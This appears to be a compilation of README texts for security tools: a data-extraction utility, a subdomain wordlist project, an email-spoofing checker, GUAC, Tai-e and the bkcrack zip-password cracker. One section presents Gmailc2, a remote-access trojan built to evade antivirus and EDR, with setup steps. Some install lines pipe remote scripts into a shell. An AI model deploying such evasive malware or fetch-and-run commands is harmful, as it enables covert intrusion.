DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

    • Supports Windows, Linux and MacOS

    Extraction Features

    • Emails
    • Files
    • Phone numbers
    • Credit Cards
    • Google API Private Key ID's
    • Social Security Numbers
    • AWS Keys
    • Bitcoin wallets
    • URL's
    • IPv4 Addresses and IPv6 addresses
    • MAC Addresses
    • SRV DNS Records
    • Extract Hashes
      • MD4 & MD5
      • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
      • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
      • MySQL 323, MySQL 41
      • NTLM
      • bcrypt

    Want more?

    Please read the contributing guidelines here

    Quick Install

    Install Rust and Github

    Linux

    wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

    Windows

    Enter the line below in an elevated powershell window.

    IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

    Relaunch your terminal and you will be able to use ds from the command line.

    Mac

    curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

    Command Line Arguments



    Video Guide

    Examples

Extracting Files From a Remote Website

Here I use wget to make a request to stackoverflow, then forward the body text to ds. The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra HTML). The result is then piped to uniq, which removes any duplicate files found.

     wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


    Extracting Mac Addresses From an Output File

Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifier string in front of the results; in this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches; normally, when a match is found, the tool moves on to the next line rather than checking again.

    $ ./ds -m -T --hide -f /var/log/autodeauth/log     
    2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
    2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

    Reading all files in a directory

The line below will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e is used to search for emails.

    $ find . -type f -exec ds -f {} -CDe \;


    Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time was recorded.

    Computer Specs

    Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
    Ram 12.0 GB (11.9 GB usable)

    Searching all data types

    Command Speed
    cat test.txt | ds -t 00h:02m:04s
    ds -t -f test.txt 00h:02m:05s
    cat test.txt | ds -t -o output.txt 00h:02m:06s

    Using specific queries

    Command Speed Query Count
    cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22s 2
    cat test.txt | ds -tF6c 00h:00m:32s 3

    Project Goals

    • JSON and CSV output
• Untar/unzip and a directory searching mode
    • Base64 Detection and decoding


    Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


     A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
    and Network Traffic Restrictions


    Note:

This RAT communicates via Gmail SMTP (you can use any other SMTP provider as well), but Gmail SMTP is a good choice because most companies block unknown traffic, while Gmail traffic is considered valid and allowed almost everywhere.

    Warning:

1. Don't upload any payloads to VirusTotal.com, because this tool will stop working over time.
2. VirusTotal shares signatures with AV companies.
3. Again, don't be an idiot!

    How To Setup

1. Create two separate Gmail accounts.
2. Now enable SMTP on both accounts (check YouTube if you don't know how).
3. Suppose you have already created two separate Gmail accounts with SMTP enabled:
    A -> first account represents Your_1st_gmail@gmail.com
    B -> 2nd account represents your_2nd_gmail@gmail.com
    4. Now Go To server.py file and fill the following at line 67:
    smtpserver="smtp.gmail.com" (don't change this)
    smtpuser="Your_1st_gmail@gmail.com"
    smtpkey="your_1st_gmail_app_password"
    imapserver="imap.gmail.com" (don't change this)
    imapboy="your_2nd_gmail@gmail.com"
    5. Now Go To client.py file and fill the following at line 16:
    imapserver = "imap.gmail.com" (dont change this)
    username = "your_2nd_gmail@gmail.com"
    password = "your2ndgmailapp password"
    getting = "Your_1st_gmail@gmail.com"
    smtpserver = "smtp.gmail.com" (don 't change this)
    6. Enjoy

    How To Run:-

     *:- For Windows:-
1. Make sure python3 and pip are installed and the requirements are also installed
    2. python server.py (on server side)


    *:- For Linux:-
1. Make sure all requirements are installed.
    2. python3 server.py (on server side)

    C2 Feature:-

     1) Persistence (type persist)
    2) Shell Access
    3) System Info (type info)
    4) More Features Will Be Added

    Features:-

    1) FUD Ratio 0/40
    2) Bypass Any EDR's Solutions
    3) Bypass Any Network Restrictions
    4) Commands Are Being Sent in Base64 And Decoded on server side
    5) No More Tcp Shits

    Warning:-

Use this tool only for educational purposes; I will not be responsible for your cruel acts.


    Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


    Online tool: https://weakpass.com/generate/domains

    TL;DR

During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find the answers to the following questions:

    1. What are the most popular subdomains?
    2. What are the most common words in multilevel subdomains on different levels?
    3. What are the most used words in subdomains?

    And, of course, wordlists for all of the questions above!


    Methodology

As sources, I used lists of subdomains from public bug bounty programs that were collected by chaos.projectdiscovery.io and bounty-targets-data, or that just had responsible disclosure programs, with a total number of 4095 domains! If a subdomain appears in more than 5-10 different scopes, it is put in the corresponding list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less.

You can find the complete list of sources here
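A small Python sketch of this counting rule (the scopes and subdomains below are invented for illustration): each word counts at most once per scope, and words are bucketed by their level within the subdomain, matching the level_N lists described further down.

# Count subdomain words per level, at most once per scope.
from collections import Counter, defaultdict

scopes = {
    "google.com": ["dev.stg.google.com", "dev.google.com", "dev.stg.google.com"],
    "twitter.com": ["dev.stg.twitter.com"],
}

level_counts = defaultdict(Counter)

for scope, subdomains in scopes.items():
    seen = set()  # deduplicate within a scope so frequency == number of scopes
    for fqdn in set(subdomains):
        labels = fqdn[: -len(scope) - 1].split(".")  # "dev.stg.google.com" -> ["dev", "stg"]
        for level, word in enumerate(reversed(labels), start=1):
            seen.add((level, word))
    for level, word in seen:
        level_counts[level][word] += 1

print(dict(level_counts))  # level 1: stg=2, dev=1; level 2: dev=2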

    Lists

    Subdomains

In these lists you will find the most popular subdomains as-is.

    Name Words count Size
    subdomains.txt.gz 21901389 501MB
    subdomains_top100.txt 100 706B
    subdomains_top1000.txt 1000 7.2KB
    subdomains_top10000.txt 10000 70KB

    Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. For example, the dev.stg subdomain will be split into two words, dev and stg; dev will have level = 2, stg level = 1. You can use these wordlists for combinatory attacks in subdomain searches. There are several types of level_N.txt wordlists that follow the same idea as the subdomain lists.

    Name Words count Size
    level_1.txt.gz 8096054 153MB
    level_2.txt.gz 7556074 106MB
    level_3.txt.gz 1490999 18MB
    level_4.txt.gz 205969 3.2MB
    level_5.txt.gz 71716 849KB
    level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6KB
    level_2_top100.txt 100 550B
    level_2_top1000.txt 1000 5.6KB
    level_3_top100.txt 100 531B
    level_3_top1000.txt 1000 5.1KB
    level_4_top100.txt 100 525B
    level_4_top1000.txt 1000 5.0KB
    level_5_top100.txt 100 449B
    level_5_top1000.txt 1000 5.0KB
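
The level splitting and the combinatory use of these lists can be sketched in a few lines of Python (illustrative only, not the repository's code; the word samples and the example.com target are made up):

from itertools import product

def split_by_level(prefix):
    # 'dev.stg' -> {2: 'dev', 1: 'stg'}; level 1 is the label closest to the apex domain.
    labels = prefix.split(".")
    return dict(zip(range(len(labels), 0, -1), labels))

print(split_by_level("dev.stg"))  # {2: 'dev', 1: 'stg'}

# Combinatory attack: pair top level-2 words with top level-1 words.
level_2_words = ["dev", "api", "admin"]   # e.g. taken from level_2_top100.txt
level_1_words = ["stg", "prod"]           # e.g. taken from level_1_top100.txt
candidates = ["%s.%s.example.com" % pair for pair in product(level_2_words, level_1_words)]
print(candidates[:3])  # ['dev.stg.example.com', 'dev.prod.example.com', 'api.stg.example.com']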

Popular split subdomains

In these lists, you will find the most popular split words from subdomains across all levels. For example, the dev.stg subdomain will be split into two words, dev and stg.

    Name Words count Size
    words.txt.gz 17229401 278MB
    words_top100.txt 100 597B
    words_top1000.txt 1000 5.5KB
    words_top10000.txt 10000 62KB

    Google Drive

    You can download all the files from Google Drive

    Attributions

    Thanks!



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerabilities Of Domains


Verify whether a domain is vulnerable to email spoofing with Email-Vulnerablity-Checker.

    Features

• This tool automatically tells you whether a domain can be email-spoofed or not
• You can check a single domain or multiple domains at once (for the multi-domain check, supply a text file containing the domains); a minimal sketch of the underlying idea follows below
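
The script name spfvuln.sh and the dig dependency suggest the check is based on SPF (and related DMARC) DNS records. The following Python sketch shows what such a check can look like; it is an assumption for illustration, not the tool's actual logic, and it shells out to the same dig utility installed below:

import subprocess

def dig_txt(name):
    # Return the TXT records for a DNS name using the dig CLI.
    out = subprocess.run(["dig", "+short", "TXT", name],
                         capture_output=True, text=True, check=False)
    return [line.strip('"') for line in out.stdout.splitlines()]

def check_spoofable(domain):
    spf = [r for r in dig_txt(domain) if r.startswith("v=spf1")]
    dmarc = [r for r in dig_txt("_dmarc." + domain) if r.startswith("v=DMARC1")]
    if not spf:
        return domain + ": no SPF record - likely spoofable"
    if any(tag in spf[0] for tag in ("~all", "?all")) and not dmarc:
        return domain + ": permissive SPF and no DMARC - likely spoofable"
    return domain + ": SPF/DMARC present - review the policy manually"

print(check_spoofable("example.com"))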

    Usage:

    Clone the package by running:

git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

    Step 1. Install Requirements

    # Update the package list and install dig for Debian-based Linux distribution 
    sudo apt update
    sudo apt install dnsutils

    # Install dig for CentOS
    sudo yum install bind-utils

    # Install dig for macOS
    brew install dig

Step 2. Finish The Installation

To use Email-Vulnerablity-Checker, type the following commands in a terminal:

    apt install git -y 
apt install dnsutils -y   # provides the dig command
    git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
    cd Email-Vulnerablity-Checker
    chmod 777 spfvuln.sh

Run the email vulnerability checker by just typing:

    ./spfvuln.sh -h

    Support

    For Queries: Telegram
    Contributions, issues, and feature requests are welcome!
Give a ⭐ if you like this project!



    GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at the contributor guide and the "express interest" issue.

    Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseβ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.
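
As a purely illustrative sketch of that idea (this is not GUAC's API, schema, or query language; the package names and the vulnerability identifier are made up), aggregation can be thought of as normalizing identities and recording typed edges between them, which can then be queried:

from collections import defaultdict

def normalize(identity):
    # Collapse different spellings of the same artifact into one canonical identity.
    return identity.strip().lower()

edges = defaultdict(set)  # adjacency list: subject -> {(predicate, object), ...}

def add_relationship(subject, predicate, obj):
    edges[normalize(subject)].add((predicate, normalize(obj)))

# Ingest facts that might come from an SBOM and from a vulnerability feed.
add_relationship("pkg:npm/left-pad@1.3.0", "dependencyOf", "pkg:npm/my-app@2.0.0")
add_relationship("PKG:NPM/LEFT-PAD@1.3.0", "affectedBy", "EXAMPLE-VULN-0001")

# Query: which dependencies of my-app are affected by a known vulnerability?
for subject, relations in edges.items():
    deps = {o for p, o in relations if p == "dependencyOf"}
    vulns = {o for p, o in relations if p == "affectedBy"}
    if "pkg:npm/my-app@2.0.0" in deps and vulns:
        print(subject, "is affected by", vulns)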


    Conceptually, GUAC occupies the β€œaggregation and synthesis” layer of the software supply chain transparency logical model:

    A few examples of questions answered by GUAC include:

    Quickstart

    Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

    Architecture

    Here is an overview of the architecture of GUAC:

    Supported input formats

    Additional References

    Communication

We encourage discussions on GitHub issues. We also have a public Slack channel on the OpenSSF Slack.

    For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

    Governance

    Information about governance can be found here.



    Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


    Tai-e

    What is Tai-e?

Tai-e (Chinese: 太阿; pronunciation: [ˈtaɪə:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy to learn, easy to use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

    Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

    • Powerful pointer analysis framework
      • On-the-fly call graph construction
      • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
  • Extensible analysis plugin system (allows you to conveniently develop and add new analyses that interact with pointer analysis)
    • Various fundamental/client/utility analyses
      • Fundamental analyses, e.g., reflection analysis and exception analysis
      • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
  • Clients, e.g., configurable taint analysis (allowing you to configure sources, sinks, and taint transfers)
      • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
    • Control/Data-flow analysis framework
      • Control-flow graph construction
      • Classic data-flow analyses, e.g., live variable analysis, constant propagation
      • Your data-flow analyses
    • SpotBugs-like bug detection system
      • Bug detectors, e.g., null pointer detector, incorrect clone() detector
      • Your bug detectors
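
To make the control/data-flow part of the list above concrete, here is a tiny, framework-independent sketch of a classic backward data-flow analysis (live variables) over a made-up three-block control-flow graph. It is written in Python purely for illustration and does not use Tai-e's Java API:

# For each block: "use" = variables read before any write, "def" = variables written.
cfg = {
    "entry": {"succ": ["loop"], "use": set(),      "def": {"i", "s"}},  # i = 0; s = 0
    "loop":  {"succ": ["exit"], "use": {"i", "s"}, "def": {"s"}},       # s = s + i
    "exit":  {"succ": [],       "use": {"s"},      "def": set()},       # return s
}

live_in = {block: set() for block in cfg}
live_out = {block: set() for block in cfg}

# Iterate to a fixed point: OUT[b] = union of IN over successors; IN[b] = use[b] | (OUT[b] - def[b]).
changed = True
while changed:
    changed = False
    for block, info in cfg.items():
        out_set = set().union(*(live_in[s] for s in info["succ"]))
        in_set = info["use"] | (out_set - info["def"])
        if out_set != live_out[block] or in_set != live_in[block]:
            live_out[block], live_in[block] = out_set, in_set
            changed = True

print(live_in)  # entry: set(), loop: {'i', 's'}, exit: {'s'}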

    Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


    How to Obtain Runnable Jar of Tai-e?

    The simplest way is to download it from GitHub Releases.

Alternatively, you can build the latest Tai-e yourself from the source code. This can be done simply via Gradle (be sure that Java 17 or a higher version is available on your system). You just need to run the command gradlew fatJar, and the runnable jar, which includes Tai-e and all its dependencies, will be generated in tai-e/build/.

    Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you can find more information about Tai-e such as Setup in IntelliJ IDEA, Command-Line Options, and Development of New Analysis.

    Tai-e Assignments

    In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



    Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


    Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

    Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed with the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bit integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known-plaintext attacks, as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher the ciphertext entirely, as well as other entries which were encrypted with the same password. It can also be used to brute-force the password with a complexity of n^(l-6), where n is the size of the character set and l is the length of the password.
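
The XOR relationship that makes the attack possible can be shown in a few lines of Python (illustrative only - this is not bkcrack's attack code, and the stand-in keystream below is not the real ZipCrypto generator):

plaintext = b"PK\x03\x04 known header bytes"
keystream = bytes((i * 37 + 11) % 256 for i in range(len(plaintext)))  # stand-in keystream

ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))

# An attacker who knows the plaintext recovers the keystream bytes directly...
recovered_keystream = bytes(c ^ p for c, p in zip(ciphertext, plaintext))
assert recovered_keystream == keystream

# ...and in the real attack, 12 or more such bytes are enough to reconstruct the
# generator's three 32-bit internal keys and decrypt the rest of the archive.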

    bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

    • Recover internal state from ciphertext and plaintext.
    • Change a ZIP archive's password using the internal state.
    • Recover the original password from the internal state.

    Install

    Precompiled packages

    You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, macOS and Windows are available for download. Extract the downloaded archive wherever you like.

    On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

    Compile from source

    Alternatively, you can compile the project with CMake.

    First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

    cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
    cmake --build build --config Release
    cmake --build build --config Release --target install

Third-party packages

    bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

    Usage

    List entries

    You can see a list of entry names and metadata in an archive named archive.zip like this:

    bkcrack -L archive.zip

    Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

    Recover internal keys

    The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

    Load data from zip archives

    Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

    bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

    Load data from files

    Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

    bkcrack -c cipherfile -p plainfile

    Offset

    If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

    bkcrack -c cipherfile -p plainfile -o offset

    Sparse plaintext

If you only know a little contiguous plaintext (between 8 and 11 bytes), but also know some bytes at other known offsets, you can provide this information to reach the required total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

    bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

    Number of threads

    If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

    Decipher

    If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

    bkcrack -c cipherfile -p plainfile -d decipheredfile

    If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

    bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

    Decompress

    The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

    python3 tools/inflate.py < decipheredfile > decompressedfile
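
For reference, raw deflate decompression of that kind can be done with Python's standard zlib module; the sketch below is not the tools/inflate.py script itself, just the standard-library approach, and it can be invoked the same way (reading stdin and writing stdout):

import sys
import zlib

def inflate_raw(data):
    # ZIP entries store raw deflate data, so a negative wbits value tells zlib
    # not to expect a zlib/gzip header.
    decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
    return decompressor.decompress(data) + decompressor.flush()

if __name__ == "__main__":
    sys.stdout.buffer.write(inflate_raw(sys.stdin.buffer.read()))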

    Unlock encrypted archive

    It is also possible to generate a new encrypted archive with the password of your choice:

    bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

    The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

    Recover password

    Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

    bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

    You can be more specific by specifying a minimal password length:

    bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

    Learn

    A tutorial is provided in the example folder.

    For more information, have a look at the documentation and read the source.

    Contribute

    Do not hesitate to suggest improvements or submit pull requests on GitHub.

    License

    This project is provided under the terms of the zlib/png license.


